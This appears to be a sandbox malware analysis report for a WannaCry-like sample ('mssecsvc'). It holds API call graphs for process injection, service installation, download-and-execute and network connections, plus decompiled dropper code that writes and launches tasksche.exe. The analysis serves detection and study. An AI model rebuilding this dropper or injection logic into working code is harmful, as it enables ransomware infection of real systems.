7fea663a 6279 7fea6647 6276->6279 6280 7fea6644 6279->6280 6281 7fea6652 6279->6281 6283 7fea6658 6281->6283 6286 7fea2574 6283->6286 6305 7fea252f NtOpenSection 6286->6305 6288 7fea257c 6289 7fea2582 NtMapViewOfSection CloseHandle 6288->6289 6290 7fea2661 6288->6290 6289->6290 6292 7fea25ba 6289->6292 6290->6280 6291 7fea25ef 6307 7fea2477 NtProtectVirtualMemory NtWriteVirtualMemory 6291->6307 6292->6291 6306 7fea2477 NtProtectVirtualMemory NtWriteVirtualMemory 6292->6306 6295 7fea2600 6308 7fea2477 NtProtectVirtualMemory NtWriteVirtualMemory 6295->6308 6297 7fea2611 6309 7fea2477 NtProtectVirtualMemory NtWriteVirtualMemory 6297->6309 6299 7fea2622 6300 7fea2637 6299->6300 6310 7fea2477 NtProtectVirtualMemory NtWriteVirtualMemory 6299->6310 6302 7fea264c 6300->6302 6311 7fea2477 NtProtectVirtualMemory NtWriteVirtualMemory 6300->6311 6302->6290 6312 7fea2477 NtProtectVirtualMemory NtWriteVirtualMemory 6302->6312 6305->6288 6306->6291 6307->6295 6308->6297 6309->6299 6310->6300 6311->6302 6312->6290 7094 7fea443b 7097 7fea144a LookupPrivilegeValueA NtAdjustPrivilegesToken 7094->7097 7096 7fea4441 7097->7096 6392 7fea02fe 6393 7fea0415 6392->6393 6395 7fea042d 6393->6395 6426 7fea10ce 6395->6426 6397 7fea048f 6398 7fea04dd 6397->6398 6399 7fea04b0 GetModuleHandleA 6397->6399 6400 7fea04f8 GetVersion 6398->6400 6399->6398 6401 7fea05ca 6400->6401 6402 7fea050f VirtualAlloc 6400->6402 6403 7fea05a9 CloseHandle 6401->6403 6404 7fea05d3 SetProcessAffinityMask 6401->6404 6402->6403 6408 7fea0532 6402->6408 6406 7fea05f2 GetModuleHandleA 6403->6406 6433 7fea05f2 GetModuleHandleA 6404->6433 6407 7fea10ce 2 API calls 6406->6407 6410 7fea05ec 6407->6410 6408->6403 6430 7fea05ba 6408->6430 6409 7fea06fc lstrcpyW 6452 7fea24ae lstrcpyW lstrlenW 6409->6452 6410->6403 6410->6409 6413 7fea074c NtMapViewOfSection 6410->6413 6414 7fea0717 GetPEB lstrcpyW lstrcatW 6410->6414 6416 7fea0780 NtOpenProcessToken 6410->6416 6417 7fea07c5 CreateToolhelp32Snapshot Process32First 6410->6417 6418 7fea07eb Process32Next 6410->6418 6419 7fea2574 5 API calls 6410->6419 6422 7fea07fd OpenProcess 6410->6422 6423 7fea085c CloseHandle 6410->6423 6424 7fea0834 CreateRemoteThread 6410->6424 6425 7fea05ba Sleep 6410->6425 6455 7fea07ac 6410->6455 6413->6403 6413->6410 6415 7fea24ae 3 API calls 6414->6415 6415->6410 6416->6410 6416->6417 6417->6410 6418->6410 6421 7fea0865 CloseHandle 6418->6421 6419->6410 6421->6403 6422->6410 6422->6418 6423->6418 6424->6410 6424->6423 6425->6423 6427 7fea10db 6426->6427 6427->6426 6428 7fea115c 6427->6428 6429 7fea1133 GetModuleHandleA GetProcAddress 6427->6429 6428->6397 6429->6427 6431 7fea05c9 6430->6431 6432 7fea05bf Sleep 6430->6432 6431->6403 6432->6430 6434 7fea10ce 2 API calls 6433->6434 6443 7fea060e 6434->6443 6435 7fea05a9 CloseHandle 6435->6433 6436 7fea06fc lstrcpyW 6437 7fea24ae 3 API calls 6436->6437 6437->6443 6438 7fea074c NtMapViewOfSection 6438->6435 6438->6443 6439 7fea0717 GetPEB lstrcpyW lstrcatW 6440 7fea24ae 3 API calls 6439->6440 6440->6443 6441 7fea0780 NtOpenProcessToken 6442 7fea07c5 CreateToolhelp32Snapshot Process32First 6441->6442 6441->6443 6442->6443 6443->6435 6443->6436 6443->6438 6443->6439 6443->6441 6443->6442 6444 7fea07eb Process32Next 6443->6444 6445 7fea2574 5 API calls 6443->6445 6446 7fea07ac 30 API calls 6443->6446 6448 7fea07fd OpenProcess 6443->6448 6449 7fea085c CloseHandle 6443->6449 6450 7fea0834 CreateRemoteThread 6443->6450 6451 7fea05ba Sleep 6443->6451 6444->6443 6447 7fea0865 CloseHandle 6444->6447 6445->6443 6446->6443 6447->6435 6448->6443 6448->6444 6449->6444 6450->6443 6450->6449 6451->6449 6453 7fea6ce7 6452->6453 6454 7fea24ea NtCreateSection 6453->6454 6454->6410 6477 7fea144a LookupPrivilegeValueA NtAdjustPrivilegesToken 6455->6477 6457 7fea07b2 FreeLibrary CloseHandle 6458 7fea07c5 CreateToolhelp32Snapshot Process32First 6457->6458 6470 7fea060e 6458->6470 6459 7fea07eb Process32Next 6461 7fea0865 CloseHandle 6459->6461 6459->6470 6460 7fea2574 5 API calls 6460->6470 6464 7fea05a9 CloseHandle 6461->6464 6462 7fea07fd OpenProcess 6462->6459 6462->6470 6463 7fea085c CloseHandle 6463->6459 6466 7fea05f2 GetModuleHandleA 6464->6466 6465 7fea0834 CreateRemoteThread 6465->6463 6465->6470 6467 7fea10ce 2 API calls 6466->6467 6467->6470 6468 7fea05ba Sleep 6468->6463 6469 7fea06fc lstrcpyW 6471 7fea24ae 3 API calls 6469->6471 6470->6458 6470->6459 6470->6460 6470->6462 6470->6463 6470->6464 6470->6465 6470->6468 6470->6469 6472 7fea074c NtMapViewOfSection 6470->6472 6473 7fea0717 GetPEB lstrcpyW lstrcatW 6470->6473 6475 7fea0780 NtOpenProcessToken 6470->6475 6476 7fea07ac 13 API calls 6470->6476 6471->6470 6472->6464 6472->6470 6474 7fea24ae 3 API calls 6473->6474 6474->6470 6475->6458 6475->6470 6476->6470 6477->6457 6334 409a16 __set_app_type __p__fmode __p__commode 6335 409a85 6334->6335 6336 409a99 6335->6336 6337 409a8d __setusermatherr 6335->6337 6346 409b8c _controlfp 6336->6346 6337->6336 6339 409a9e _initterm __getmainargs _initterm 6340 409af2 GetStartupInfoA 6339->6340 6342 409b26 GetModuleHandleA 6340->6342 6347 408140 InternetOpenA InternetOpenUrlA InternetCloseHandle InternetCloseHandle 6342->6347 6346->6339 6350 408090 GetModuleFileNameA __p___argc 6347->6350 6349 4081b2 exit _XcptFilter 6351 4080b0 6350->6351 6352 4080b9 OpenSCManagerA 6350->6352 6361 407f20 6351->6361 6353 408101 StartServiceCtrlDispatcherA 6352->6353 6354 4080cf OpenServiceA 6352->6354 6353->6349 6356 4080fc CloseServiceHandle 6354->6356 6357 4080ee 6354->6357 6356->6353 6366 407fa0 ChangeServiceConfig2A 6357->6366 6360 4080f6 CloseServiceHandle 6360->6356 6378 407c40 sprintf OpenSCManagerA 6361->6378 6363 407f25 6367 407ce0 GetModuleHandleW 6363->6367 6366->6360 6368 407d01 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 6367->6368 6369 407f08 6367->6369 6368->6369 6370 407d49 6368->6370 6369->6349 6370->6369 6371 407d69 FindResourceA 6370->6371 6371->6369 6372 407d84 LoadResource 6371->6372 6372->6369 6373 407d94 LockResource 6372->6373 6373->6369 6374 407da7 SizeofResource 6373->6374 6374->6369 6375 407db9 sprintf sprintf MoveFileExA CreateFileA 6374->6375 6375->6369 6376 407e54 WriteFile CloseHandle CreateProcessA 6375->6376 6376->6369 6377 407ef2 CloseHandle CloseHandle 6376->6377 6377->6369 6379 407c74 CreateServiceA 6378->6379 6380 407cca 6378->6380 6381 407cbb CloseServiceHandle 6379->6381 6382 407cad StartServiceA CloseServiceHandle 6379->6382 6380->6363 6381->6363 6382->6381 7098 b9116f LoadLibraryA 7101 b91196 GetProcAddress 7098->7101 7100 b91180 7101->7100 6620 b933e0 6621 b933e5 6620->6621 6622 b9346f MapViewOfFile CloseHandle 6621->6622 6623 b93440 NtOpenSection 6621->6623 6626 b934b0 6622->6626 6627 b935f3 6622->6627 6625 b9345f NtQuerySystemInformation 6623->6625 6623->6627 6624 b934b7 UnmapViewOfFile 6624->6627 6625->6622 6626->6624 6626->6627 7068 b96620 7069 b96647 5 API calls 7068->7069 7070 b9662a 7069->7070 7071 b91422 LookupPrivilegeValueA NtAdjustPrivilegesToken 7102 b92762 7104 b92768 7102->7104 7105 b92839 InternetCloseHandle 7104->7105 7106 b92780 GetTempPathA 7104->7106 7114 b927a7 GetTempFileNameA CreateFileA 7106->7114 7108 b927a3 CreateFileA 7109 b92829 InternetCloseHandle 7108->7109 7110 b927ce InternetReadFile 7108->7110 7109->7105 7111 b927e8 7110->7111 7112 b927fe CloseHandle CreateProcessA 7110->7112 7111->7112 7113 b927ea WriteFile 7111->7113 7112->7109 7113->7110 7113->7112 7115 b92829 InternetCloseHandle 7114->7115 7116 b927ce InternetReadFile 7114->7116 7119 b92839 InternetCloseHandle 7115->7119 7117 b927e8 7116->7117 7118 b927fe CloseHandle CreateProcessA 7116->7118 7117->7118 7120 b927ea WriteFile 7117->7120 7118->7115 7119->7108 7120->7116 7120->7118 7121 b92665 7123 b9266b CreateThread CloseHandle 7121->7123 7124 b93c38 7123->7124 7126 b93c3d 7124->7126 7127 b93ca9 7126->7127 7132 b93c5b GetWindowsDirectoryA 7126->7132 7181 b9252f NtOpenSection 7127->7181 7129 b93cae 7130 b93cfb GetSystemDirectoryA 7129->7130 7131 b93cb5 7129->7131 7226 b93d1f lstrcat 7130->7226 7182 b93cc2 GetModuleHandleA 7131->7182 7134 b93d26 7132->7134 7268 b93d36 LoadLibraryA 7134->7268 7181->7129 7183 b93ccc 7182->7183 7184 b93cde 7182->7184 7186 b93cd4 GetProcAddress 7183->7186 7309 b93cf0 GetModuleHandleA 7184->7309 7186->7184 7227 b93d26 7226->7227 7228 b93d36 151 API calls 7227->7228 7229 b93d2b GetProcAddress LoadLibraryA 7228->7229 7231 b910ce 2 API calls 7229->7231 7232 b93d7d 7231->7232 7233 b93d92 GetTickCount 7232->7233 7234 b93daa 7233->7234 7235 b93e47 GetVolumeInformationA 7234->7235 7236 b93e7a 7235->7236 7237 b93f25 7236->7237 7238 b93eb5 96 API calls 7236->7238 7239 b93f4f 7237->7239 7240 b93f31 CreateThread CloseHandle 7237->7240 7241 b93ea9 7238->7241 7242 b93f60 43 API calls 7239->7242 7240->7239 7241->7237 7243 b93f14 7241->7243 7245 b93eca GetModuleFileNameA wsprintfA 7241->7245 7244 b93f54 7242->7244 7243->7237 7246 b93405 5 API calls 7243->7246 7247 b910ce 2 API calls 7244->7247 7245->7243 7246->7237 7248 b93f7e 7247->7248 7249 b93f8f 23 API calls 7248->7249 7250 b93f83 7249->7250 7251 b93ffa CreateEventA 7250->7251 7252 b93fd3 CreateThread CloseHandle 7250->7252 7265 b94012 7251->7265 7252->7251 7253 b94065 gethostbyname 7253->7265 7254 b94056 lstrlen 7254->7253 7254->7254 7255 b94081 socket 7258 b940a6 connect 7255->7258 7255->7265 7256 b94320 RtlExitUserThread 7257 b942d0 SetEvent 7257->7265 7260 b942b7 closesocket 7258->7260 7258->7265 7259 b942f2 Sleep ResetEvent 7259->7265 7260->7265 7261 b940ef GetVersionExA 7261->7265 7262 b94172 wsprintfA 7262->7265 7263 b941a7 CreateThread CloseHandle 7263->7265 7264 b941f6 GetTickCount 7264->7265 7265->7253 7265->7254 7265->7255 7265->7256 7265->7257 7265->7259 7265->7260 7265->7261 7265->7262 7265->7263 7265->7264 7266 b94288 Sleep 7265->7266 7266->7265 7267 b94294 GetTickCount 7266->7267 7267->7265 7466 b93d4b GetProcAddress LoadLibraryA 7268->7466 7352 b926d4 7309->7352 7312 b93d1f 179 API calls 7313 b93d12 GetProcAddress LoadLibraryA 7312->7313 7315 b910ce 2 API calls 7313->7315 7316 b93d7d 7315->7316 7317 b93d92 GetTickCount 7316->7317 7318 b93daa 7317->7318 7319 b93e47 GetVolumeInformationA 7318->7319 7320 b93e7a 7319->7320 7321 b93f25 7320->7321 7354 b93eb5 LoadLibraryA 7320->7354 7323 b93f4f 7321->7323 7324 b93f31 CreateThread CloseHandle 7321->7324 7386 b93f60 LoadLibraryA 7323->7386 7324->7323 7353 b926c8 GetSystemDirectoryA 7352->7353 7353->7312 7408 b93ecc GetProcAddress GetModuleFileNameA wsprintfA 7354->7408 7387 b93f7e 7386->7387 7388 b910ce 2 API calls 7386->7388 7389 b93f8f 23 API calls 7387->7389 7388->7387 7390 b93f83 7389->7390 7391 b93ffa CreateEventA 7390->7391 7392 b93fd3 CreateThread CloseHandle 7390->7392 7405 b94012 7391->7405 7392->7391 7393 b94065 gethostbyname 7393->7405 7394 b94056 lstrlen 7394->7393 7394->7394 7395 b94081 socket 7398 b940a6 connect 7395->7398 7395->7405 7396 b94320 RtlExitUserThread 7397 b942d0 SetEvent 7397->7405 7400 b942b7 closesocket 7398->7400 7398->7405 7399 b942f2 Sleep ResetEvent 7399->7405 7400->7405 7401 b940ef GetVersionExA 7401->7405 7402 b94172 wsprintfA 7402->7405 7403 b941a7 CreateThread CloseHandle 7403->7405 7404 b941f6 GetTickCount 7404->7405 7405->7393 7405->7394 7405->7395 7405->7396 7405->7397 7405->7399 7405->7400 7405->7401 7405->7402 7405->7403 7405->7404 7406 b94288 Sleep 7405->7406 7406->7405 7407 b94294 GetTickCount 7406->7407 7407->7405 7409 b93f14 7408->7409 7410 b93f25 7409->7410 7437 b93405 7409->7437 7412 b93f4f 7410->7412 7413 b93f31 CreateThread CloseHandle 7410->7413 7414 b93f60 43 API calls 7412->7414 7413->7412 7415 b93f54 7414->7415 7416 b910ce 2 API calls 7415->7416 7417 b93f7e 7416->7417 7445 b93f8f LoadLibraryA 7417->7445 7438 b9343b 7437->7438 7438->7438 7439 b93440 NtOpenSection 7438->7439 7440 b9345f NtQuerySystemInformation 7439->7440 7444 b935f3 7439->7444 7441 b9346f MapViewOfFile CloseHandle 7440->7441 7443 b934b0 7441->7443 7441->7444 7442 b934b7 UnmapViewOfFile 7442->7444 7443->7442 7443->7444 7444->7410 7446 b93f9d 7445->7446 7447 b94320 RtlExitUserThread 7445->7447 7448 b910ce 2 API calls 7446->7448 7449 b93fb5 7448->7449 7449->7447 7450 b93fc2 WSAStartup CreateThread CloseHandle 7449->7450 7451 b93ffa CreateEventA 7450->7451 7454 b94012 7451->7454 7452 b94065 gethostbyname 7452->7454 7453 b94056 lstrlen 7453->7452 7453->7453 7454->7447 7454->7452 7454->7453 7455 b94081 socket 7454->7455 7456 b942d0 SetEvent 7454->7456 7458 b942f2 Sleep ResetEvent 7454->7458 7459 b942b7 closesocket 7454->7459 7460 b940ef GetVersionExA 7454->7460 7461 b94172 wsprintfA 7454->7461 7462 b941a7 CreateThread CloseHandle 7454->7462 7463 b941f6 GetTickCount 7454->7463 7464 b94288 Sleep 7454->7464 7455->7454 7457 b940a6 connect 7455->7457 7456->7454 7457->7454 7457->7459 7458->7454 7459->7454 7460->7454 7461->7454 7462->7454 7463->7454 7464->7454 7465 b94294 GetTickCount 7464->7465 7465->7454 7467 b93d7d 7466->7467 7468 b910ce 2 API calls 7466->7468 7469 b93d92 GetTickCount 7467->7469 7468->7467 7470 b93daa 7469->7470 7471 b93e47 GetVolumeInformationA 7470->7471 7472 b93e7a 7471->7472 7473 b93f25 7472->7473 7474 b93eb5 96 API calls 7472->7474 7475 b93f4f 7473->7475 7476 b93f31 CreateThread CloseHandle 7473->7476 7477 b93ea9 7474->7477 7478 b93f60 43 API calls 7475->7478 7476->7475 7477->7473 7479 b93f14 7477->7479 7481 b93eca GetModuleFileNameA wsprintfA 7477->7481 7480 b93f54 7478->7480 7479->7473 7482 b93405 5 API calls 7479->7482 7483 b910ce 2 API calls 7480->7483 7481->7479 7482->7473 7484 b93f7e 7483->7484 7485 b93f8f 23 API calls 7484->7485 7486 b93f83 7485->7486 7487 b93ffa CreateEventA 7486->7487 7488 b93fd3 CreateThread CloseHandle 7486->7488 7501 b94012 7487->7501 7488->7487 7489 b94065 gethostbyname 7489->7501 7490 b94056 lstrlen 7490->7489 7490->7490 7491 b94081 socket 7494 b940a6 connect 7491->7494 7491->7501 7492 b94320 RtlExitUserThread 7493 b942d0 SetEvent 7493->7501 7496 b942b7 closesocket 7494->7496 7494->7501 7495 b942f2 Sleep ResetEvent 7495->7501 7496->7501 7497 b940ef GetVersionExA 7497->7501 7498 b94172 wsprintfA 7498->7501 7499 b941a7 CreateThread CloseHandle 7499->7501 7500 b941f6 GetTickCount 7500->7501 7501->7489 7501->7490 7501->7491 7501->7492 7501->7493 7501->7495 7501->7496 7501->7497 7501->7498 7501->7499 7501->7500 7502 b94288 Sleep 7501->7502 7502->7501 7503 b94294 GetTickCount 7502->7503 7503->7501 6478 b93399 6480 b933a2 6478->6480 6481 b933a9 Sleep 6480->6481 6481->6481 7072 b93819 7074 b9381f WaitForSingleObject 7072->7074 7075 b9383b closesocket 7074->7075 7076 b93845 7074->7076 7075->7076 6639 b90fd6 6640 b910a0 6639->6640 6641 b9115c 6640->6641 6642 b91133 GetModuleHandleA GetProcAddress 6640->6642 6642->6640 6482 b93888 6484 b9388e GetSystemTime 6482->6484 6492 b938d2 6484->6492 6485 b9390c Sleep 6485->6492 6486 b93a32 6487 b93924 InternetGetConnectedState 6487->6492 6488 b93954 gethostbyname 6489 b9397a socket 6488->6489 6488->6492 6490 b93990 ioctlsocket connect Sleep 6489->6490 6489->6492 6490->6492 6491 b93a1f closesocket 6491->6492 6492->6485 6492->6486 6492->6487 6492->6488 6492->6491 7077 b90000 7078 b90004 7077->7078 7079 b900a1 7078->7079 7081 b9025e 7078->7081 7085 b90105 7081->7085 7084 b90278 7084->7079 7086 b90116 GetPEB 7085->7086 7086->7084 6647 7fea1196 GetProcAddress

                                                                                Executed Functions

                                                                                Function 00407CE0 Relevance: 50.9, APIs: 18, Strings: 11, Instructions: 175libraryloaderfileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                C-Code - Quality: 86%
                                                                                			E00407CE0() {
				void _v259;
				char _v260;
				void _v519;
				char _v520;
				struct _STARTUPINFOA _v588;
				struct _PROCESS_INFORMATION _v604;
				long _v608;
				_Unknown_base(*)()* _t36;
				void* _t38;
				void* _t39;
				void* _t50;
				int _t59;
				struct HINSTANCE__* _t104;
				struct HRSRC__* _t105;
				void* _t107;
				void* _t108;
				long _t109;
				intOrPtr _t121;
				intOrPtr _t122;

				_t104 = GetModuleHandleW(L"kernel32.dll");
				if(_t104 != 0) {
					 *0x431478 = GetProcAddress(_t104, "CreateProcessA");
					 *0x431458 = GetProcAddress(_t104, "CreateFileA");
					 *0x431460 = GetProcAddress(_t104, "WriteFile");
					_t36 = GetProcAddress(_t104, "CloseHandle");
					 *0x43144c = _t36;
					if( *0x431478 != 0) {
						_t121 =  *0x431458; // 0x76cdf7b0
						if(_t121 != 0) {
							_t122 =  *0x431460; // 0x76cdfc30
							if(_t122 != 0 && _t36 != 0) {
								_t105 = FindResourceA(0, 0x727, "R");
								if(_t105 != 0) {
									_t38 = LoadResource(0, _t105);
									if(_t38 != 0) {
										_t39 = LockResource(_t38);
										_v608 = _t39;
										if(_t39 != 0) {
											_t109 = SizeofResource(0, _t105);
											if(_t109 != 0) {
												_v520 = 0;
												memset( &_v519, 0, 0x40 << 2);
												asm("stosw");
												asm("stosb");
												_v260 = 0;
												memset( &_v259, 0, 0x40 << 2);
												asm("stosw");
												asm("stosb");
												sprintf( &_v520, "C:\\%s\\%s", "WINDOWS", "tasksche.exe");
												sprintf( &_v260, "C:\\%s\\qeriuwjhrf", "WINDOWS");
												MoveFileExA( &_v520,  &_v260, 1); // executed
												_t50 = CreateFileA( &_v520, 0x40000000, 0, 0, 2, 4, 0); // executed
												_t107 = _t50;
												if(_t107 != 0xffffffff) {
													WriteFile(_t107, _v608, _t109,  &_v608, 0); // executed
													CloseHandle(_t107);
													_v604.hThread = 0;
													_v604.dwProcessId = 0;
													_v604.dwThreadId = 0;
													memset( &(_v588.lpReserved), 0, 0x10 << 2);
													asm("repne scasb");
													_v604.hProcess = 0;
													_t108 = " /i";
													asm("repne scasb");
													memcpy( &_v520 - 1, _t108, 0 << 2);
													memcpy(_t108 + 0x175b75a, _t108, 0);
													_v588.cb = 0x44;
													_v588.wShowWindow = 0;
													_v588.dwFlags = 0x81;
													_t59 = CreateProcessA(0,  &_v520, 0, 0, 0, 0x8000000, 0, 0,  &_v588,  &_v604); // executed
													if(_t59 != 0) {
														CloseHandle(_v604.hThread);
														CloseHandle(_v604);
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				return 0;
			}






















                                                                                0x00407cf5
                                                                                0x00407cfb
                                                                                0x00407d15
                                                                                0x00407d22
                                                                                0x00407d2f
                                                                                0x00407d34
                                                                                0x00407d3c
                                                                                0x00407d43
                                                                                0x00407d49
                                                                                0x00407d4f
                                                                                0x00407d55
                                                                                0x00407d5b
                                                                                0x00407d7a
                                                                                0x00407d7e
                                                                                0x00407d86
                                                                                0x00407d8e
                                                                                0x00407d95
                                                                                0x00407d9d
                                                                                0x00407da1
                                                                                0x00407daf
                                                                                0x00407db3
                                                                                0x00407dc4
                                                                                0x00407dc8
                                                                                0x00407dca
                                                                                0x00407dcc
                                                                                0x00407ddb
                                                                                0x00407de2
                                                                                0x00407def
                                                                                0x00407df1
                                                                                0x00407e01
                                                                                0x00407e18
                                                                                0x00407e2c
                                                                                0x00407e43
                                                                                0x00407e49
                                                                                0x00407e4e
                                                                                0x00407e61
                                                                                0x00407e68
                                                                                0x00407e72
                                                                                0x00407e7a
                                                                                0x00407e82
                                                                                0x00407e8b
                                                                                0x00407e95
                                                                                0x00407e9b
                                                                                0x00407e9f
                                                                                0x00407ea8
                                                                                0x00407eb0
                                                                                0x00407ebc
                                                                                0x00407ed3
                                                                                0x00407edb
                                                                                0x00407ee0
                                                                                0x00407ee8
                                                                                0x00407ef0
                                                                                0x00407ef7
                                                                                0x00407f02
                                                                                0x00407f02
                                                                                0x00407ef0
                                                                                0x00407e4e
                                                                                0x00407db3
                                                                                0x00407da1
                                                                                0x00407d8e
                                                                                0x00407d7e
                                                                                0x00407d5b
                                                                                0x00407d4f
                                                                                0x00407d43
                                                                                0x00407f14

                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,6F89FB10,?,00000000), ref: 00407CEF
                                                                                • GetProcAddress.KERNEL32(00000000,CreateProcessA), ref: 00407D0D
                                                                                • GetProcAddress.KERNEL32(00000000,CreateFileA), ref: 00407D1A
                                                                                • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00407D27
                                                                                • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00407D34
                                                                                • FindResourceA.KERNEL32(00000000,00000727,0043137C), ref: 00407D74
                                                                                • LoadResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407D86
                                                                                • LockResource.KERNEL32(00000000,?,00000000), ref: 00407D95
                                                                                • SizeofResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407DA9
                                                                                • sprintf.MSVCRT ref: 00407E01
                                                                                • sprintf.MSVCRT ref: 00407E18
                                                                                • MoveFileExA.KERNEL32 ref: 00407E2C
                                                                                • CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000004,00000000), ref: 00407E43
                                                                                • WriteFile.KERNELBASE(00000000,?,00000000,?,00000000), ref: 00407E61
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00407E68
                                                                                • CreateProcessA.KERNELBASE ref: 00407EE8
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00407EF7
                                                                                • CloseHandle.KERNEL32(08000000), ref: 00407F02
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.663214895.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.663184131.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.663260796.0000000000409000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.663302461.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.663328344.000000000040B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.663379016.000000000040F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.663454036.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.663555779.0000000000710000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.665288410.0000000000A6B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressHandleProcResource$CloseFile$Createsprintf$FindLoadLockModuleMoveProcessSizeofWrite
                                                                                • String ID: /i$C:\%s\%s$C:\%s\qeriuwjhrf$CloseHandle$CreateFileA$CreateProcessA$D$WINDOWS$WriteFile$kernel32.dll$tasksche.exe
                                                                                • API String ID: 4281112323-1507730452
                                                                                • Opcode ID: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
                                                                                • Instruction ID: 13a48b3e7e70fc1f7524b3ea2ca00aec236584d0bbebcf852995d03268f4a9c8
                                                                                • Opcode Fuzzy Hash: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
                                                                                • Instruction Fuzzy Hash: B15197715043496FE7109F74DC84AAB7B98EB88354F14493EF651A32E0DA7898088BAA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00B9042D Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 290memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 13 b9042d-b904a4 call b910ce 16 b904dd 13->16 17 b904a6-b904db call b9273c GetModuleHandleA 13->17 19 b904e4-b90509 call b92750 GetVersion 16->19 17->19 23 b905ca-b905d1 19->23 24 b9050f-b90530 VirtualAlloc 19->24 25 b905a9-b905b3 FindCloseChangeNotification 23->25 27 b905d3-b905fc SetProcessAffinityMask call b905f2 23->27 24->25 26 b90532-b90562 call b90305 24->26 25->23 26->25 37 b90564-b9057b 26->37 32 b905fe-b9061c 27->32 33 b90621-b90623 27->33 32->33 35 b9064c-b90652 33->35 36 b90625-b90630 33->36 35->25 40 b90658-b90671 35->40 38 b90639-b90648 36->38 39 b90632 36->39 37->25 44 b9057d-b905a4 call b905ba 37->44 38->35 39->38 40->25 41 b90677-b90690 40->41 41->25 43 b90696-b9069c 41->43 45 b906d8-b906de 43->45 46 b9069e-b906b1 43->46 44->25 48 b906fc-b90715 lstrcpyW call b924ae 45->48 49 b906e0-b906f3 45->49 46->25 47 b906b7-b906bd 46->47 47->45 52 b906bf-b906d2 47->52 55 b9074c-b90775 NtMapViewOfSection 48->55 56 b90717-b90746 GetPEB lstrcpyW lstrcatW call b924ae 48->56 49->48 53 b906f5 49->53 52->25 52->45 53->48 55->25 59 b9077b-b9078f call b90305 NtOpenProcessToken 55->59 56->25 56->55 64 b90791-b907a3 call b9115d call b907ac 59->64 65 b907c5-b907e4 CreateToolhelp32Snapshot Process32First 59->65 76 b9080e-b9080f 64->76 77 b907a5 64->77 67 b907eb-b907f5 Process32Next 65->67 68 b90865-b90872 FindCloseChangeNotification 67->68 69 b907f7-b907fb 67->69 68->25 69->67 71 b907fd-b9080d OpenProcess 69->71 71->67 73 b9080f 71->73 75 b90810-b90818 call b92574 73->75 82 b9081a-b90820 75->82 83 b9085c-b90863 FindCloseChangeNotification 75->83 76->75 77->75 79 b907a7-b907e4 CreateToolhelp32Snapshot Process32First 77->79 79->67 82->83 84 b90822-b90832 82->84 83->67 84->83 85 b90834-b9084b CreateRemoteThread 84->85 85->83 86 b9084d-b90857 call b905ba 85->86 86->83
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00000000), ref: 00B904BE
                                                                                • GetVersion.KERNEL32 ref: 00B90500
                                                                                • VirtualAlloc.KERNEL32(00000000,000077C4,08001000,00000040), ref: 00B90528
                                                                                • FindCloseChangeNotification.KERNELBASE(?), ref: 00B905AD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocChangeCloseFindHandleModuleNotificationVersionVirtual
                                                                                • String ID: \BaseNamedObjects\reytVt$\BaseNamedObjects\reytVt$csrs
                                                                                • API String ID: 2920002527-2732440246
                                                                                • Opcode ID: 1675a9fdbf51ac598faf71083b84e51afed01ab3c173c7fa300afc3e2da58e2b
                                                                                • Instruction ID: 2e6f6150404bea961f42db9881debfdfcedde1f08683218da20bbe8c9619891a
                                                                                • Opcode Fuzzy Hash: 1675a9fdbf51ac598faf71083b84e51afed01ab3c173c7fa300afc3e2da58e2b
                                                                                • Instruction Fuzzy Hash: 3BB1B971625209FFEF21AF24C84ABAA3BEDEF55310F1100A9E9089E181C7F49F449B59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00B905F2 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 193stringnativeprocessCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
